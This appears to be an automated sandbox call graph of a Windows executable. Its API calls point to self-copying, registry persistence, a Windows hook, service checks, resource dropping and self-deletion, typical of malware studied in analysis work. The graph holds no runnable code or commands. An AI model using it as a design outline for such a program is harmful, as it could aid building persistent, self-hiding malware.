13022->13023 13024 42ac51 GetFileType 13022->13024 13025 42ac5c 13022->13025 13023->13017 13023->13018 13029 42acf7 13023->13029 13024->13022 13024->13025 13025->13020 13025->13022 13027 42b4df __lock 2 API calls 13025->13027 13026->13019 13026->13022 13026->13023 13027->13025 13028 42b4df __lock 2 API calls 13028->13029 13029->13020 13029->13023 13029->13028 13031 42aa64 13030->13031 13032 42aa45 GetEnvironmentStringsW 13030->13032 13034 42aa4d 13031->13034 13035 42aaf4 13031->13035 13033 42aa59 GetLastError 13032->13033 13032->13034 13033->13031 13037 42aa83 WideCharToMultiByte 13034->13037 13038 42aa7b GetEnvironmentStringsW 13034->13038 13036 42ab00 GetEnvironmentStrings 13035->13036 13039 425ea6 13035->13039 13036->13039 13045 42ab0c 13036->13045 13041 42aab7 13037->13041 13042 42aae9 FreeEnvironmentStringsW 13037->13042 13038->13037 13038->13039 13053 42a987 13039->13053 13044 4263b4 __getbuf 36 API calls 13041->13044 13042->13039 13043 4263b4 __getbuf 36 API calls 13052 42ab25 13043->13052 13046 42aabd 13044->13046 13045->13043 13046->13042 13047 42aac6 WideCharToMultiByte 13046->13047 13049 42aad7 13047->13049 13050 42aae0 13047->13050 13048 42ab3b FreeEnvironmentStringsA 13048->13039 13051 4255be ___free_lc_time 36 API calls 13049->13051 13050->13042 13051->13050 13052->13048 13054 42a999 13053->13054 13055 42a99e GetModuleFileNameA 13053->13055 13160 42b499 13054->13160 13057 42a9c6 13055->13057 13058 4263b4 __getbuf 36 API calls 13057->13058 13059 42a9f1 13058->13059 13059->12966 13061 42a761 13060->13061 13064 42a766 _strlen 13060->13064 13062 42b499 ___initmbctable 65 API calls 13061->13062 13062->13064 13063 4263b4 __getbuf 36 API calls 13070 42a797 _strcat _strlen 13063->13070 13064->13063 13067 425ec1 13064->13067 13065 42a7e0 13066 4255be ___free_lc_time 36 API calls 13065->13066 13066->13067 13067->12971 13067->12972 13068 4263b4 __getbuf 36 API calls 13068->13070 13069 42a805 13071 4255be ___free_lc_time 36 API calls 13069->13071 13070->13065 13070->13067 13070->13068 13070->13069 13071->13067 13073 4291f3 13072->13073 13074 42570f 40 API calls 13073->13074 13075 425ed4 13073->13075 13074->13075 13075->12975 13075->12976 13077 42a703 13076->13077 13079 42a708 __wincmdln 13076->13079 13078 42b499 ___initmbctable 65 API calls 13077->13078 13078->13079 13079->12979 13328 413af0 13080->13328 13082 415091 13083 415586 13082->13083 13084 41509c GetModuleFileNameA 13082->13084 13085 424873 _fast_error_exit 36 API calls 13083->13085 13087 4150bc 13084->13087 13086 415594 13085->13086 13086->12982 13088 4150d4 13087->13088 13089 41514f ExpandEnvironmentStringsA CopyFileA 13087->13089 13348 4129c0 13088->13348 13093 4152c5 lstrcpyA lstrcatA CreateProcessA 13089->13093 13094 415356 13089->13094 13092 4150d9 13092->13083 13095 4150e1 13092->13095 13093->13094 13096 415342 CloseHandle CloseHandle 13093->13096 13331 4122f0 GetModuleFileNameA CreateFileA 13094->13331 13357 41c660 13095->13357 13096->13094 13099 41535b 13101 415379 Sleep 13099->13101 13102 41535e 13099->13102 13100 4150e6 13103 415103 13100->13103 13104 4150ea 13100->13104 13113 415510 13101->13113 13338 412620 GetCurrentDirectoryA GetTempFileNameA 13102->13338 13426 413ad0 13103->13426 13105 424873 _fast_error_exit 36 API calls 13104->13105 13108 4150fb 13105->13108 13108->12982 13110 415108 13432 412fc0 13110->13432 13112 424873 _fast_error_exit 36 API calls 13115 415371 13112->13115 13113->13113 13116 41556c MessageBoxA 13113->13116 13115->12982 13116->13083 13119 415112 13454 413dd0 13119->13454 13133 429254 _fast_error_exit 36 API calls 13132->13133 13134 429324 13133->13134 13134->12983 13136 425d76 13135->13136 13137 425d7b 13135->13137 13138 42a55a _fast_error_exit 36 API calls 13136->13138 13139 42a3e3 _fast_error_exit 36 API calls 13137->13139 13138->13137 13140 425d84 13139->13140 13141 429190 _fast_error_exit 3 API calls 13140->13141 13142 425d8e 13141->13142 13142->12952 13144 429254 _fast_error_exit 36 API calls 13143->13144 13145 429344 13144->13145 13145->12986 13147 4284a8 13146->13147 13147->12991 13147->12994 13149 427441 13148->13149 13150 42b4df __lock 2 API calls 13149->13150 13151 427125 13149->13151 13150->13149 13151->12998 13151->12999 13153 426f55 FlsFree 13152->13153 13157 426f63 13152->13157 13153->13157 13154 42749b DeleteCriticalSection 13156 4255be ___free_lc_time 36 API calls 13154->13156 13155 4274b3 13158 4274c5 DeleteCriticalSection 13155->13158 13159 42712e 13155->13159 13156->13157 13157->13154 13157->13155 13158->13155 13159->12955 13161 42b4a2 13160->13161 13163 42b4a9 13160->13163 13164 42b349 13161->13164 13163->13055 13165 42b355 ___initmbctable 13164->13165 13166 42758b __lock 36 API calls 13165->13166 13167 42b360 13166->13167 13168 42b386 13167->13168 13169 42b374 GetOEMCP 13167->13169 13170 42b39d 13168->13170 13171 42b38b GetACP 13168->13171 13169->13170 13173 4263b4 __getbuf 36 API calls 13170->13173 13174 42b3db 13170->13174 13178 42b478 13170->13178 13171->13170 13173->13174 13179 42b3ed 13174->13179 13180 42b1b9 13174->13180 13175 42b487 ___initmbctable 13175->13163 13177 4255be ___free_lc_time 36 API calls 13177->13178 13188 42b490 13178->13188 13179->13177 13179->13178 13181 42b1d7 13180->13181 13187 42b202 ___initmbctable 13180->13187 13182 42b1ee GetCPInfo 13181->13182 13181->13187 13182->13187 13184 42b335 13185 424873 _fast_error_exit 36 API calls 13184->13185 13186 42b347 13185->13186 13186->13179 13187->13184 13191 42b02d GetCPInfo 13187->13191 13327 4274d6 LeaveCriticalSection 13188->13327 13190 42b497 13190->13175 13192 42b11f 13191->13192 13193 42b05d 13191->13193 13196 424873 _fast_error_exit 36 API calls 13192->13196 13201 42b56a 13193->13201 13195 42b0d3 13224 42a027 13195->13224 13198 42b1b7 13196->13198 13198->13184 13199 42b0f7 13200 42a027 ___initmbctable 61 API calls 13199->13200 13200->13192 13202 42b576 ___initmbctable 13201->13202 13203 42b580 GetStringTypeW 13202->13203 13206 42b598 13202->13206 13204 42b5a0 GetLastError 13203->13204 13203->13206 13204->13206 13205 42b6ad 13268 42c8b2 GetLocaleInfoA 13205->13268 13206->13205 13207 42b5cb 13206->13207 13209 42b5e7 MultiByteToWideChar 13207->13209 13211 42b6a7 ___initmbctable 13207->13211 13209->13211 13218 42b615 ___initmbctable _fast_error_exit 13209->13218 13211->13195 13212 42b6f9 GetStringTypeA 13212->13211 13214 42b712 13212->13214 13215 4255be ___free_lc_time 36 API calls 13214->13215 13215->13211 13216 42b6ed 13216->13211 13216->13212 13217 42b673 MultiByteToWideChar 13220 42b68a GetStringTypeW 13217->13220 13221 42b69b 13217->13221 13218->13217 13219 42af1a __lock 36 API calls 13218->13219 13222 42b664 13219->13222 13220->13221 13221->13211 13223 4255be ___free_lc_time 36 API calls 13221->13223 13222->13211 13222->13217 13223->13211 13225 42a033 ___initmbctable 13224->13225 13226 42a03d LCMapStringW 13225->13226 13229 42a058 13225->13229 13227 42a060 GetLastError 13226->13227 13226->13229 13227->13229 13228 42a27f 13231 42c8b2 ___initmbctable 50 API calls 13228->13231 13229->13228 13230 42a0ab 13229->13230 13232 42a0cc MultiByteToWideChar 13230->13232 13234 42a277 ___initmbctable 13230->13234 13233 42a2a9 13231->13233 13232->13234 13237 42a0fa _fast_error_exit 13232->13237 13233->13234 13235 42a2c2 13233->13235 13236 42a3b0 LCMapStringA 13233->13236 13234->13199 13239 42c8f5 ___initmbctable 43 API calls 13235->13239 13238 42a3ad 13236->13238 13240 42a159 MultiByteToWideChar 13237->13240 13242 4263b4 __getbuf 36 API calls 13237->13242 13238->13234 13245 4255be ___free_lc_time 36 API calls 13238->13245 13241 42a2d4 13239->13241 13243 42a176 LCMapStringW 13240->13243 13244 42a25c 13240->13244 13241->13234 13246 42a2de LCMapStringA 13241->13246 13247 42a146 13242->13247 13243->13244 13248 42a195 13243->13248 13249 42a269 13244->13249 13252 4255be ___free_lc_time 36 API calls 13244->13252 13245->13234 13250 42a378 13246->13250 13260 42a2fd ___initmbctable _fast_error_exit 13246->13260 13247->13234 13247->13240 13251 42a19b 13248->13251 13256 42a1c8 _fast_error_exit 13248->13256 13249->13234 13253 4255be ___free_lc_time 36 API calls 13249->13253 13250->13238 13254 4255be ___free_lc_time 36 API calls 13250->13254 13251->13244 13255 42a1ad LCMapStringW 13251->13255 13252->13249 13253->13234 13254->13238 13255->13244 13257 42a223 LCMapStringW 13256->13257 13258 4263b4 __getbuf 36 API calls 13256->13258 13257->13244 13261 42a23b WideCharToMultiByte 13257->13261 13262 42a214 13258->13262 13259 42a35b LCMapStringA 13259->13250 13264 42a37c 13259->13264 13260->13259 13263 4263b4 __getbuf 36 API calls 13260->13263 13261->13244 13262->13244 13262->13257 13267 42a340 ___initmbctable 13263->13267 13266 42c8f5 ___initmbctable 43 API calls 13264->13266 13266->13250 13267->13250 13267->13259 13269 42c8e1 13268->13269 13270 42c8dc 13268->13270 13300 4259c0 13269->13300 13272 424873 _fast_error_exit 36 API calls 13270->13272 13273 42b6cd 13272->13273 13273->13211 13273->13212 13274 42c8f5 13273->13274 13275 42c901 ___initmbctable 13274->13275 13276 42c928 GetCPInfo 13275->13276 13292 42ca38 13275->13292 13277 42c939 13276->13277 13283 42c94c _strlen 13276->13283 13278 42c93f GetCPInfo 13277->13278 13277->13283 13278->13283 13279 4255be ___free_lc_time 36 API calls 13280 42c9f2 13279->13280 13282 424873 _fast_error_exit 36 API calls 13280->13282 13281 42c980 MultiByteToWideChar 13281->13280 13285 42c99a ___initmbctable _fast_error_exit 13281->13285 13284 42cab8 ___initmbctable 13282->13284 13283->13281 13283->13285 13284->13216 13286 42ca00 MultiByteToWideChar 13285->13286 13288 42af1a __lock 36 API calls 13285->13288 13287 42ca1b 13286->13287 13286->13292 13289 42ca40 13287->13289 13290 42ca20 WideCharToMultiByte 13287->13290 13291 42c9ea 13288->13291 13293 42ca45 WideCharToMultiByte 13289->13293 13294 42ca5b 13289->13294 13290->13292 13291->13280 13291->13286 13292->13279 13292->13280 13293->13292 13293->13294 13295 42af1a __lock 36 API calls 13294->13295 13296 42ca63 13295->13296 13296->13292 13297 42ca6c WideCharToMultiByte 13296->13297 13297->13292 13298 42ca80 13297->13298 13299 4255be ___free_lc_time 36 API calls 13298->13299 13299->13292 13301 426f68 __lock 36 API calls 13300->13301 13302 4259c7 13301->13302 13305 4259d7 13302->13305 13307 427a79 13302->13307 13306 425a05 13305->13306 13315 427871 13305->13315 13306->13270 13308 427a85 ___initmbctable 13307->13308 13309 42758b __lock 36 API calls 13308->13309 13310 427a8c 13309->13310 13319 4279b8 13310->13319 13314 427aa2 ___initmbctable 13314->13305 13316 42788f 13315->13316 13318 427886 13315->13318 13317 42b56a ___initmbctable 50 API calls 13316->13317 13317->13318 13318->13305 13320 426f68 __lock 36 API calls 13319->13320 13322 4279be 13320->13322 13321 427a73 13324 427aab 13321->13324 13322->13321 13323 4278e8 ___initmbctable 36 API calls 13322->13323 13323->13321 13325 4274d6 ___free_lc_time LeaveCriticalSection 13324->13325 13326 427ab2 13325->13326 13326->13314 13327->13190 13572 421d50 13328->13572 13330 413b08 13330->13082 13332 412336 13331->13332 13333 41234c SetFilePointer ReadFile CloseHandle 13331->13333 13334 424873 _fast_error_exit 36 API calls 13332->13334 13335 424873 _fast_error_exit 36 API calls 13333->13335 13336 412345 13334->13336 13337 412399 13335->13337 13336->13099 13337->13099 13798 40c1d0 GetTickCount GetTickCount GetTickCount GetTickCount 13338->13798 13340 41266b GetProcessHeap HeapAlloc 13341 4126f5 6 API calls 13340->13341 13344 412690 13340->13344 13346 424873 _fast_error_exit 36 API calls 13341->13346 13342 4126af CreateFileA WriteFile CloseHandle GetProcessHeap HeapFree 13342->13341 13344->13342 13799 40c1d0 GetTickCount GetTickCount GetTickCount GetTickCount 13344->13799 13347 4129ad 13346->13347 13347->13112 13349 412a92 13348->13349 13349->13349 13350 412aa6 ExpandEnvironmentStringsA CreateFileA 13349->13350 13351 412af3 ReadFile CloseHandle 13350->13351 13352 412add 13350->13352 13353 424873 _fast_error_exit 36 API calls 13351->13353 13354 424873 _fast_error_exit 36 API calls 13352->13354 13356 412b21 13353->13356 13355 412aec 13354->13355 13355->13092 13356->13092 13358 41c710 13357->13358 13358->13358 13359 41c72a LoadLibraryA 13358->13359 13360 41c740 13359->13360 13361 41c756 13359->13361 13362 424873 _fast_error_exit 36 API calls 13360->13362 13364 41c7f9 GetProcAddress 13361->13364 13363 41c74f 13362->13363 13363->13100 13365 41c828 GetProcAddress 13364->13365 13366 41c80f 13364->13366 13365->13366 13367 41c86c GetProcAddress 13365->13367 13368 424873 _fast_error_exit 36 API calls 13366->13368 13367->13366 13369 41c8d4 13367->13369 13370 41c821 13368->13370 13371 41c99f GetProcAddress 13369->13371 13370->13100 13371->13366 13372 41c9b3 13371->13372 13373 41ca22 GetProcAddress 13372->13373 13373->13366 13374 41ca36 GetProcAddress 13373->13374 13374->13366 13375 41ca8e GetProcAddress 13374->13375 13375->13366 13376 41cace GetProcAddress 13375->13376 13376->13366 13378 41cbc1 GetProcAddress 13376->13378 13378->13366 13379 41cc21 GetProcAddress 13378->13379 13379->13366 13381 41cce4 GetProcAddress 13379->13381 13381->13366 13383 41cd7c GetProcAddress 13381->13383 13383->13366 13385 41ce75 13383->13385 13386 41cf19 GetProcAddress 13385->13386 13386->13366 13387 41cf2d GetProcAddress 13386->13387 13387->13366 13389 41cfb0 13387->13389 13390 41d030 GetProcAddress 13389->13390 13390->13366 13391 41d044 GetProcAddress 13390->13391 13391->13366 13393 41d1bc 13391->13393 13394 41d285 GetProcAddress 13393->13394 13394->13366 13395 41d299 GetProcAddress 13394->13395 13395->13366 13396 41d2f1 GetProcAddress 13395->13396 13396->13366 13397 41d349 GetProcAddress 13396->13397 13397->13366 13399 41d4b2 13397->13399 13400 41d53b LoadLibraryA 13399->13400 13401 41ddc9 13400->13401 13402 41d54d GetProcAddress 13400->13402 13403 424873 _fast_error_exit 36 API calls 13401->13403 13402->13366 13406 41d646 GetProcAddress 13402->13406 13404 41ddd9 13403->13404 13404->13100 13406->13366 13408 41d6b0 GetProcAddress 13406->13408 13408->13366 13410 41d727 GetProcAddress 13408->13410 13410->13366 13412 41d819 13410->13412 13413 41d962 GetProcAddress 13412->13413 13413->13366 13414 41d976 LoadLibraryA 13413->13414 13414->13401 13416 41da0d GetProcAddress 13414->13416 13416->13366 13418 41da96 13416->13418 13419 41db5b GetProcAddress 13418->13419 13419->13366 13420 41db6f 13419->13420 13421 41dc13 LoadLibraryA 13420->13421 13421->13366 13422 41dc23 13421->13422 13423 41dcd9 GetProcAddress 13422->13423 13423->13366 13424 41dced 13423->13424 13425 41ddb4 GetProcAddress 13424->13425 13425->13401 13800 421ec0 13426->13800 13429 421d50 153 API calls 13430 413adf SetEvent SetEvent SetEvent SetEvent SetEvent 13429->13430 13430->13110 13844 412c90 13432->13844 13434 412fd7 13435 413260 13434->13435 13437 4131d4 GetModuleFileNameA lstrcatA RegOpenKeyExA 13434->13437 13436 424873 _fast_error_exit 36 API calls 13435->13436 13438 41326c 13436->13438 13437->13435 13439 413215 lstrlenA RegSetValueExA RegCloseKey 13437->13439 13440 4120c0 13438->13440 13439->13435 13441 412193 13440->13441 13441->13441 13442 4121a7 ExpandEnvironmentStringsA GetFileAttributesA 13441->13442 13443 41223b LoadLibraryA 13442->13443 13444 41220a 13442->13444 13446 412293 GetProcAddress 13443->13446 13447 412272 13443->13447 13856 41e0b0 13444->13856 13450 4122d8 13446->13450 13449 424873 _fast_error_exit 36 API calls 13447->13449 13448 412230 13448->13443 13448->13450 13451 41228c 13449->13451 13452 424873 _fast_error_exit 36 API calls 13450->13452 13451->13119 13453 4122e6 13452->13453 13453->13119 13871 41aa30 13454->13871 13456 413e01 13878 416660 CreateMutexA 13456->13878 13458 413e18 13879 4046e0 13458->13879 13460 413e29 13882 40b540 13460->13882 13464 413e4f 13465 413e68 13464->13465 13466 413e5d Sleep 13464->13466 13467 413e7f 13465->13467 13468 413ece 13465->13468 13466->13465 13916 408ad0 13467->13916 13470 413ef6 13468->13470 13471 413edc CreateThread 13468->13471 13933 401830 13470->13933 13473 413efb 13471->13473 15229 401960 13471->15229 13472 413e93 13922 404590 CloseHandle 13472->13922 13938 413b70 13473->13938 13477 413ea4 13925 416690 CloseHandle 13477->13925 13480 4122f0 41 API calls 13481 413f13 13480->13481 13950 416760 13481->13950 13482 413eb5 13926 41a8f0 CloseHandle 13482->13926 13485 413f3a 13953 40b300 13485->13953 13486 424873 _fast_error_exit 36 API calls 13487 415051 13486->13487 13525 412b30 13487->13525 13490 40b300 78 API calls 13491 4142c7 13490->13491 13492 40b300 78 API calls 13491->13492 13493 4144f5 13492->13493 13494 40b300 78 API calls 13493->13494 13495 414691 13494->13495 13496 40b300 78 API calls 13495->13496 13497 414875 13496->13497 13498 40b300 78 API calls 13497->13498 13499 414974 13498->13499 13500 40b300 78 API calls 13499->13500 13501 414b1e 13500->13501 13502 40b300 78 API calls 13501->13502 13503 414c6a 13502->13503 13504 40b300 78 API calls 13503->13504 13505 414e20 CreateEventA CreateThread 13504->13505 13506 414f72 13505->13506 13507 414e88 13505->13507 15185 401260 13505->15185 13508 414f83 WaitForSingleObject CloseHandle 13506->13508 13509 414fa8 WaitForSingleObject CloseHandle 13506->13509 13988 4123a0 GetModuleFileNameA 13507->13988 13508->13509 14022 416790 13509->14022 13524 413ec9 13524->13486 13526 412c02 13525->13526 13526->13526 13527 412c16 ExpandEnvironmentStringsA GetLocalTime CreateFileA WriteFile CloseHandle 13526->13527 13528 424873 _fast_error_exit 36 API calls 13527->13528 13529 412c7c 13528->13529 13530 413280 13529->13530 13531 413400 13530->13531 13531->13531 13532 41340e RegOpenKeyA 13531->13532 13533 413462 GetModuleFileNameA MoveFileExA 13532->13533 13534 41342a RegDeleteValueA RegCloseKey 13532->13534 13535 413550 13533->13535 13534->13533 13535->13535 13536 413564 ExpandEnvironmentStringsA DeleteFileA 13535->13536 13537 413690 13536->13537 13537->13537 13538 4136aa ExpandEnvironmentStringsA DeleteFileA 13537->13538 13539 4137c2 13538->13539 13539->13539 13540 4137dc ExpandEnvironmentStringsA DeleteFileA 13539->13540 13541 413801 MoveFileExA 13540->13541 13542 41380e ExpandEnvironmentStringsA DeleteFileA 13540->13542 13541->13542 13544 4139a0 13542->13544 13544->13544 13545 4139b4 ExpandEnvironmentStringsA DeleteFileA 13544->13545 13546 413a80 13545->13546 13546->13546 13547 413a94 ExpandEnvironmentStringsA DeleteFileA 13546->13547 13548 424873 _fast_error_exit 36 API calls 13547->13548 13549 413ac1 13548->13549 13550 41ef50 ResetEvent 13549->13550 13573 421d64 13572->13573 13574 421d5d 13572->13574 13704 41f8e0 13573->13704 13574->13330 13576 421d6c 13593 41fd50 13576->13593 13582 421d87 13630 4210d0 13582->13630 13590 421dab 13750 41f250 13590->13750 13594 420050 13593->13594 13595 4201a0 GetProcessHeap HeapAlloc RegOpenKeyExA 13594->13595 13596 420256 RegQueryValueExA 13595->13596 13597 420248 GetLastError 13595->13597 13598 420290 GetLastError 13596->13598 13599 42029e 13596->13599 13597->13596 13616 42036a 13598->13616 13761 425a4d 13599->13761 13603 4202f1 13607 425a4d 36 API calls 13603->13607 13604 4203b4 13774 41f100 CreateEventA 13604->13774 13605 4259c0 ___initmbctable 50 API calls 13605->13603 13608 42031e 13607->13608 13612 4259c0 ___initmbctable 50 API calls 13608->13612 13614 42032b 13608->13614 13609 4203c4 GetProcessHeap HeapFree RegCloseKey 13610 424873 _fast_error_exit 36 API calls 13609->13610 13611 4203f4 13610->13611 13618 420400 13611->13618 13612->13614 13613 425a4d 36 API calls 13615 42035d 13613->13615 13614->13613 13615->13616 13617 4259c0 ___initmbctable 50 API calls 13615->13617 13766 41f020 OpenSCManagerA 13616->13766 13617->13616 13619 4204d6 13618->13619 13629 420555 13619->13629 13779 41efa0 OpenSCManagerA 13619->13779 13621 42051b 13622 41efa0 7 API calls 13621->13622 13624 42052b 13622->13624 13623 424873 _fast_error_exit 36 API calls 13625 420566 13623->13625 13626 41f020 11 API calls 13624->13626 13729 420570 13625->13729 13627 420540 13626->13627 13628 41f020 11 API calls 13627->13628 13628->13629 13629->13623 13631 421240 GetProcessHeap HeapAlloc RegOpenKeyExA 13630->13631 13633 4214bb GetLastError 13631->13633 13634 4214c9 13631->13634 13633->13634 13635 41f020 11 API calls 13634->13635 13636 421505 13635->13636 13637 41f100 5 API calls 13636->13637 13638 421518 GetProcessHeap HeapFree RegCloseKey 13637->13638 13639 424873 _fast_error_exit 36 API calls 13638->13639 13640 421544 13639->13640 13641 421550 13640->13641 13642 421710 13641->13642 13642->13642 13643 4217ee GetProcessHeap HeapAlloc RegOpenKeyExA 13642->13643 13644 421890 RegQueryValueExA 13643->13644 13645 421888 GetLastError 13643->13645 13646 4218b0 GetLastError 13644->13646 13647 4218bd 13644->13647 13645->13644 13648 421944 13646->13648 13649 425a4d 36 API calls 13647->13649 13650 41f020 11 API calls 13648->13650 13651 4218c8 13649->13651 13653 4219a2 13650->13653 13652 4218d5 13651->13652 13654 4259c0 ___initmbctable 50 API calls 13651->13654 13656 425a4d 36 API calls 13652->13656 13655 41f100 5 API calls 13653->13655 13654->13652 13657 4219b5 GetProcessHeap HeapFree RegCloseKey 13655->13657 13658 4218e9 13656->13658 13659 424873 _fast_error_exit 36 API calls 13657->13659 13660 4218f6 13658->13660 13662 4259c0 ___initmbctable 50 API calls 13658->13662 13661 421a0a 13659->13661 13663 425a4d 36 API calls 13660->13663 13666 421a20 13661->13666 13662->13660 13664 421937 13663->13664 13664->13648 13665 4259c0 ___initmbctable 50 API calls 13664->13665 13665->13648 13667 421b30 13666->13667 13667->13667 13668 421ba4 GetProcessHeap HeapAlloc RegOpenKeyExA 13667->13668 13669 421c60 RegQueryValueExA 13668->13669 13670 421c58 GetLastError 13668->13670 13671 421c81 GetLastError 13669->13671 13672 421c8b 13669->13672 13670->13669 13687 421ce7 13671->13687 13673 425a4d 36 API calls 13672->13673 13674 421c96 13673->13674 13676 421ca3 13674->13676 13678 4259c0 ___initmbctable 50 API calls 13674->13678 13675 41f020 11 API calls 13677 421d17 GetProcessHeap HeapFree RegCloseKey 13675->13677 13680 425a4d 36 API calls 13676->13680 13679 424873 _fast_error_exit 36 API calls 13677->13679 13678->13676 13681 421d43 13679->13681 13682 421cb8 13680->13682 13689 41f660 13681->13689 13683 4259c0 ___initmbctable 50 API calls 13682->13683 13685 421cc5 13682->13685 13683->13685 13684 425a4d 36 API calls 13686 421cda 13684->13686 13685->13684 13686->13687 13688 4259c0 ___initmbctable 50 API calls 13686->13688 13687->13675 13688->13687 13690 41f773 13689->13690 13690->13690 13691 41f796 13690->13691 13694 41f7a7 13690->13694 13692 424873 _fast_error_exit 36 API calls 13691->13692 13695 41f7a3 13692->13695 13693 41f7b4 LoadLibraryA 13696 41f7df 13693->13696 13697 41f7c9 GetProcAddress 13693->13697 13694->13693 13694->13696 13695->13590 13699 424873 _fast_error_exit 36 API calls 13696->13699 13697->13696 13698 41f7f0 SetWindowsHookExA 13697->13698 13701 41f80c 13698->13701 13700 41f7ec 13699->13700 13700->13590 13702 424873 _fast_error_exit 36 API calls 13701->13702 13703 41f821 13702->13703 13703->13590 13705 41fa16 13704->13705 13706 41fb79 GetProcessHeap HeapAlloc RegOpenKeyExA 13705->13706 13707 41fc24 GetLastError 13706->13707 13708 41fc29 RegQueryValueExA 13706->13708 13707->13708 13709 41fc51 13708->13709 13710 41fc4a GetLastError 13708->13710 13711 425a4d 36 API calls 13709->13711 13727 41fca7 13710->13727 13712 41fc5c 13711->13712 13714 41fc69 13712->13714 13717 4259c0 ___initmbctable 50 API calls 13712->13717 13713 41f020 11 API calls 13715 41fccd 13713->13715 13716 425a4d 36 API calls 13714->13716 13718 41f100 5 API calls 13715->13718 13720 41fc7b 13716->13720 13717->13714 13719 41fcdd GetProcessHeap HeapFree RegCloseKey 13718->13719 13721 424873 _fast_error_exit 36 API calls 13719->13721 13722 41fc88 13720->13722 13724 4259c0 ___initmbctable 50 API calls 13720->13724 13723 41fd45 13721->13723 13725 425a4d 36 API calls 13722->13725 13723->13576 13724->13722 13726 41fc9a 13725->13726 13726->13727 13728 4259c0 ___initmbctable 50 API calls 13726->13728 13727->13713 13728->13727 13730 420730 13729->13730 13731 420e34 GetProcessHeap HeapAlloc RegOpenKeyExA 13730->13731 13732 420f00 13731->13732 13733 420ef1 GetLastError 13731->13733 13734 420f04 RegQueryValueExA 13732->13734 13733->13734 13735 420f32 13734->13735 13736 420f27 GetLastError 13734->13736 13737 420f40 RegCloseKey RegOpenKeyExA 13735->13737 13736->13737 13738 420f60 GetLastError 13737->13738 13739 420f69 RegQueryValueExA 13737->13739 13738->13739 13740 420f92 GetLastError 13739->13740 13741 420fa7 13739->13741 13743 420fc2 13740->13743 13784 42cfce 13741->13784 13744 41f020 11 API calls 13743->13744 13745 42107e 13744->13745 13746 41f100 5 API calls 13745->13746 13747 42108e GetProcessHeap HeapFree RegCloseKey 13746->13747 13748 424873 _fast_error_exit 36 API calls 13747->13748 13749 4210c4 13748->13749 13749->13582 13751 41f327 13750->13751 13751->13751 13752 41f50e GetProcessHeap HeapAlloc GetSystemDirectoryA 13751->13752 13753 41f550 13752->13753 13754 41f631 GetProcessHeap HeapFree 13753->13754 13755 41f5e6 13753->13755 13756 41f5cf CreateEventA 13753->13756 13757 424873 _fast_error_exit 36 API calls 13754->13757 13755->13754 13758 41f5f0 CreateProcessA 13755->13758 13756->13755 13759 41f652 13757->13759 13758->13754 13760 41f613 CloseHandle CloseHandle 13758->13760 13759->13330 13760->13754 13762 426f68 __lock 36 API calls 13761->13762 13763 425a66 13762->13763 13764 424873 _fast_error_exit 36 API calls 13763->13764 13765 4202e4 13764->13765 13765->13603 13765->13605 13767 41f039 GetLastError 13766->13767 13768 41f04e OpenServiceA 13766->13768 13767->13604 13769 41f080 QueryServiceStatusEx 13768->13769 13770 41f063 GetLastError CloseServiceHandle 13768->13770 13771 41f099 GetLastError CloseServiceHandle CloseServiceHandle 13769->13771 13772 41f0bb CloseServiceHandle CloseServiceHandle 13769->13772 13770->13604 13771->13604 13773 41f0d0 13772->13773 13773->13604 13775 41f11d GetLastError 13774->13775 13776 41f12f WaitForSingleObject 13774->13776 13775->13609 13777 41f140 CloseHandle 13776->13777 13778 41f159 CloseHandle 13776->13778 13777->13609 13778->13609 13780 41efb6 GetLastError 13779->13780 13781 41efc8 OpenServiceA 13779->13781 13780->13621 13782 41eff3 CloseServiceHandle CloseServiceHandle 13781->13782 13783 41efda GetLastError CloseServiceHandle 13781->13783 13782->13621 13783->13621 13785 42cfda ___initmbctable 13784->13785 13786 426f68 __lock 36 API calls 13785->13786 13787 42cfe4 13786->13787 13788 42cff7 13787->13788 13789 427a79 ___initmbctable 36 API calls 13787->13789 13790 42a027 ___initmbctable 61 API calls 13788->13790 13791 42d003 ___initmbctable 13788->13791 13789->13788 13792 42d042 _fast_error_exit 13790->13792 13791->13743 13792->13791 13793 4263b4 __getbuf 36 API calls 13792->13793 13795 42d08f 13792->13795 13793->13795 13794 42a027 ___initmbctable 61 API calls 13796 42d0b8 _strcat 13794->13796 13795->13794 13795->13796 13796->13791 13797 4255be ___free_lc_time 36 API calls 13796->13797 13797->13791 13798->13340 13799->13344 13801 421f87 GetSystemDirectoryA 13800->13801 13803 422130 GetFileAttributesA 13801->13803 13805 422296 GetFileAttributesA 13803->13805 13806 42227f 13803->13806 13808 4222a2 13805->13808 13809 4222b6 GetFileAttributesA 13805->13809 13820 421e40 13806->13820 13811 421e40 7 API calls 13808->13811 13812 4222c5 13809->13812 13813 4222d9 13809->13813 13810 422293 13810->13805 13814 4222b3 13811->13814 13815 421e40 7 API calls 13812->13815 13827 4223a0 13813->13827 13814->13809 13815->13813 13817 4222e1 13818 424873 _fast_error_exit 36 API calls 13817->13818 13819 413ad5 13818->13819 13819->13429 13839 421de0 FindResourceA 13820->13839 13822 421e5c 13823 421e63 13822->13823 13824 421e67 CreateFileA 13822->13824 13823->13810 13825 421e91 WriteFile CloseHandle 13824->13825 13826 421e87 13824->13826 13825->13810 13826->13810 13828 422461 13827->13828 13828->13828 13829 4227e4 GetProcessHeap HeapAlloc RegOpenKeyExA RegQueryValueExA 13828->13829 13830 422848 RegCloseKey 13829->13830 13833 42286b 13829->13833 13831 424873 _fast_error_exit 36 API calls 13830->13831 13832 422864 13831->13832 13832->13817 13833->13833 13834 4228c9 RegSetValueExA 13833->13834 13835 4228eb RegCloseKey GetProcessHeap HeapFree 13834->13835 13836 4228e9 13834->13836 13837 424873 _fast_error_exit 36 API calls 13835->13837 13836->13835 13838 422917 13837->13838 13838->13817 13840 421e00 LoadResource 13839->13840 13841 421dfd 13839->13841 13842 421e15 SizeofResource LockResource 13840->13842 13843 421e0f 13840->13843 13841->13822 13842->13843 13843->13822 13845 412e80 13844->13845 13845->13845 13846 412ea4 RegOpenKeyExA 13845->13846 13847 412fa5 13846->13847 13848 412ec8 RegQueryValueExA 13846->13848 13849 424873 _fast_error_exit 36 API calls 13847->13849 13852 412f83 RegCloseKey 13848->13852 13853 412f7e 13848->13853 13850 412fb4 13849->13850 13850->13434 13854 424873 _fast_error_exit 36 API calls 13852->13854 13853->13852 13855 412f9e 13854->13855 13855->13434 13869 41dde0 13856->13869 13859 41e107 13859->13448 13860 41e10d LoadResource 13861 41e123 SizeofResource LockResource 13860->13861 13862 41e11c 13860->13862 13863 41e143 CreateFileA 13861->13863 13864 41e13b 13861->13864 13862->13448 13865 41e19b WriteFile 13863->13865 13866 41e18b 13863->13866 13864->13448 13865->13866 13867 41e240 13866->13867 13868 41e239 